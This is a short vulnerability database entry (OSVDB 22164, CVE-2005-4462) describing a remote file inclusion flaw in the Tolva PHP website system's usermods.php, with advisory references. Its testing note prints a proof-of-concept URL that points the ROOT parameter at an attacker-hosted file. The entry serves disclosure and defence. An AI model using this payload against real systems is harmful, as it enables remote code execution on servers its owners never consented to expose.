Tolva PHP website system usermods.php ROOT Variable Remote File Inclusion

2005-12-21T22:00:36
ID OSVDB:22164
Type osvdb
Reporter OSVDB
Modified 2005-12-21T22:00:36

Description

Manual Testing Notes

http://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]

References:

Vendor URL: http://sourceforge.net/projects/twebs Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0253.html CVE-2005-4462 Bugtraq ID: 16000